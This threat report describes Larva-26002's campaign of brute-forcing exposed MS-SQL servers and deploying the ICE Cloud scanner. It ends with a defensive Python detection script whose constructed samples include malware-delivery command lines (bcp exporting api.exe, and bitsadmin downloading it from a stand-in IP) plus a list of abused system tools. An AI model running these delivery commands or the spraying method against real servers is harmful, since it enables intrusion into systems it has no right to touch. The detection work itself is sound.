Threat Actors Exploit MS-SQL Servers to Deploy ICE Cloud Scanner
Key Takeaways
- The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers.
- The attackers are deploying a new Go-based scanner malware called ICE Cloud Client.
- The campaign, ongoing since January 2024, has shifted from ransomware to large-scale reconnaissance and credential harvesting.
- Poor password hygiene on internet-facing MS-SQL servers is the primary initial compromise vector.
- The campaign’s long-term nature and reconnaissance focus suggest preparation for future, larger-scale attacks.
Persistent Threat Actor Larva-26002 Leverages New ICE Cloud Scanner Against MS-SQL Servers
The threat actor tracked as Larva-26002 continues to compromise Microsoft SQL (MS-SQL) servers that are reachable from the internet and protected only by weak credentials, and is now deploying a new scanner malware dubbed ICE Cloud Client. The campaign, first observed in January 2024, has shifted from direct ransomware deployment to broad reconnaissance of database infrastructure.
Evolution of the Campaign
Larva-26002’s activity first came to light in January 2024, when the group was compromising internet-exposed MS-SQL servers secured with weak credentials and deploying Trigona and Mimic ransomware on them. The attackers abused the Bulk Copy Program (BCP), a legitimate command-line utility shipped with MS-SQL, to move data and to drop malicious payloads onto compromised hosts. Remote access tools such as AnyDesk and various port forwarders for RDP were also installed to maintain persistence.
By 2025 the group had refined its toolkit, adding Teramind, a remote monitoring and management (RMM) product, and moving to a Rust-based scanner for its operations. The steady turnover of tools shows an actor that keeps investing in its capabilities rather than a one-off campaign.
Analysts at ASEC observed a renewed surge of attacks in 2026, many of them against the same MS-SQL servers compromised earlier. In this phase Larva-26002 introduced ICE Cloud, a scanner malware written in Go, a clear departure from the Rust-based scanner seen in 2025. Turkish-language strings inside the ICE Cloud binaries tie it back to the Mimic ransomware attacks of 2024, pointing to the same operators throughout.
The pivot from ransomware to large-scale scanning is significant. By building a growing pool of compromised servers that quietly probe other databases for weak credentials, Larva-26002 appears to be laying the groundwork for larger operations. The results of that scanning are sent to the attacker’s command-and-control (C&C) server, giving the group an inventory of weakly protected database servers across the internet.
ICE Cloud Scanner: The Infection Mechanism
The attack sequence begins with Larva-26002 identifying an MS-SQL server accessible from the internet and protected by weak or easily guessable passwords. Initial access is typically gained through brute-force or dictionary attacks.
After a successful login, the attacker runs ordinary system commands such as hostname, whoami, and netstat -an to profile the host. Payload delivery usually relies on the BCP utility, which is used to export a malicious binary stored in a database table named uGnzBdZbsi to a local path as api.exe; the export is driven by a BCP format file named FODsOZKgAU.txt. This technique has been unchanged since 2024.
When BCP cannot be executed, the malware is fetched instead with curl or bitsadmin invoked through PowerShell.
The api.exe file, identified as the ICE Cloud Launcher, contacts a C&C server to authenticate. After authentication it downloads the core component, the ICE Cloud Client scanner, and saves it under a random filename to make the file harder to spot. Once installed, the ICE Cloud Client registers with the C&C server, which then sends it a list of target MS-SQL addresses, specific credential pairs to try (e.g., ecomm/ecomm), and a task string, typically TASK.
The scanner attempts to authenticate against the supplied MS-SQL targets with the supplied credentials and reports every successful login back to the C&C server. Notably, the internal strings of the ICE Cloud Client are written in Turkish and include emoji characters, which may indicate that generative AI tools were used during development.
What You Should Do
- Use strong, unique passwords for every MS-SQL login, and rotate any credential on a server that has been exposed to the internet or to brute-force attempts.
- Keep MS-SQL off the public internet where possible. Where a server must be reachable, put it behind a firewall that allows only authorized source IP addresses to the SQL listener port (TCP 1433 by default) and nothing else.
- Keep endpoint security software up to date on all systems so that known malware is detected and blocked.
- Monitor for unusual use of the BCP utility, unexpected file creations (e.g., api.exe in C:\ProgramData), and unauthorized outbound network connections, and investigate any suspicious indicators promptly.
- Regularly audit MS-SQL server configurations against security best practices and apply all available security patches and updates.
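The following Python script is an added example, not code from the original report or from ASEC, showing how the two observable stages of this intrusion chain (the password spraying against the listener described under the infection mechanism above, and the BCP, curl or bitsadmin delivery that the monitoring recommendation in this list refers to) can be turned into detection logic. Every log line and process event in it is a constructed sample: the ERRORLOG lines follow SQL Server's 18456 login-failure format, the process records follow the Sysmon event 1 field names, and the bcp and bitsadmin command lines are assumed reconstructions of the delivery steps rather than captured attacker commands. The IP addresses and install paths are likewise assumptions.

```python
"""Detection logic for the MS-SQL tradecraft described in this report.

Constructed samples only: the ERRORLOG lines follow SQL Server's 18456
login-failure format and the process events follow Sysmon event 1 fields,
but none of them are captured attacker data. The bcp and bitsadmin command
lines are assumed reconstructions of the delivery steps, not quotes from
the ASEC analysis.
"""
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# --- 1. Password spraying against the SQL listener -------------------------

LOGIN_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed ERRORLOG excerpt: six failures in under three seconds from one
# source, alternating two usernames, plus one unrelated failure.
ERRORLOG = """\
2026-01-12 03:14:05.00 spid52      Starting up database 'ecomm'.
2026-01-12 03:14:07.21 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:14:07.58 Logon       Login failed for user 'ecomm'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:14:08.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:14:08.44 Logon       Login failed for user 'ecomm'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:14:09.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:14:09.71 Logon       Login failed for user 'ecomm'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.45]
2026-01-12 03:20:01.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""


def parse_login_failures(log_text):
    """Return (timestamp, user, client_ip) for every 18456 failure line."""
    out = []
    for line in log_text.splitlines():
        m = LOGIN_FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            out.append((ts, m["user"], m["client"]))
    return out


def detect_login_spray(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag client IPs with at least `threshold` failures inside any `window`.

    Returns {client_ip: sorted list of usernames tried}.  A sliding window is
    used so a slow spray spread over the log still trips the rule."""
    by_client = {}
    for ts, user, client in parse_login_failures(log_text):
        by_client.setdefault(client, []).append((ts, user))
    hits = {}
    for client, events in by_client.items():
        events.sort()
        times = [t for t, _ in events]
        j = 0
        for i, t in enumerate(times):
            while t - times[j] > window:
                j += 1
            if i - j + 1 >= threshold:
                hits[client] = sorted({u for _, u in events})
                break
    return hits


# --- 2. sqlservr.exe spawning bcp, downloaders or recon commands -----------

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"

PROCESS_EVENTS = [  # constructed Sysmon event 1 style records
    {"ParentImage": SQLSERVR, "Image": CMD,
     "CommandLine": r'cmd.exe /c bcp "select x from master..uGnzBdZbsi" queryout C:\ProgramData\api.exe -T -f C:\ProgramData\FODsOZKgAU.txt'},
    {"ParentImage": SQLSERVR, "Image": CMD, "CommandLine": "cmd.exe /c hostname"},
    {"ParentImage": SQLSERVR, "Image": CMD, "CommandLine": "cmd.exe /c netstat -an"},
    {"ParentImage": SQLSERVR, "Image": CMD,
     "CommandLine": r'cmd.exe /c powershell -c "bitsadmin /transfer job /download /priority high http://198.51.100.9/api.exe C:\ProgramData\api.exe"'},
    # Benign DBA export from an interactive shell: must not fire any rule.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\bcp.exe",
     "CommandLine": r"bcp shop.dbo.orders out C:\exports\orders.dat -n -T"},
]

WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")
LOLBINS = {"bcp", "curl", "bitsadmin", "powershell"}
RECON = {"hostname", "whoami", "netstat"}
# bcp writing a query result straight to an executable is the delivery step.
BCP_QUERYOUT_EXE = re.compile(r"\bbcp\b.*\bqueryout\b\s+\S*\.(?:exe|dll)\b", re.I)
DOWNLOAD_EXE = re.compile(r"\b(?:curl|bitsadmin)\b.*\.exe\b", re.I)


def detect_process_chain(events):
    """Return (rule, command_line) pairs; one event can trigger several rules."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        words = {w.lower() for w in WORD_RE.findall(cmd)}
        from_sql = PureWindowsPath(ev["ParentImage"]).name.lower() == "sqlservr.exe"
        if from_sql and words & LOLBINS:
            findings.append(("sqlservr-spawned-lolbin", cmd))
        if from_sql and words & RECON:
            findings.append(("sqlservr-spawned-recon", cmd))
        if BCP_QUERYOUT_EXE.search(cmd):
            findings.append(("bcp-queryout-executable", cmd))
        if DOWNLOAD_EXE.search(cmd):
            findings.append(("downloader-fetching-executable", cmd))
    return findings


if __name__ == "__main__":
    for client, users in detect_login_spray(ERRORLOG).items():
        print(f"spray from {client}: users tried {users}")
    for rule, cmd in detect_process_chain(PROCESS_EVENTS):
        print(f"{rule}: {cmd}")
```

On a real deployment the ERRORLOG parser would read the live log (or the audit/Extended Events stream) and the process records would come from Sysmon or Windows 4688 events; the rules themselves are the part worth keeping. The `sqlservr.exe` parent check is the strongest signal, because any child process of the database engine means a command was executed through the server rather than by an administrator at a shell.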
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.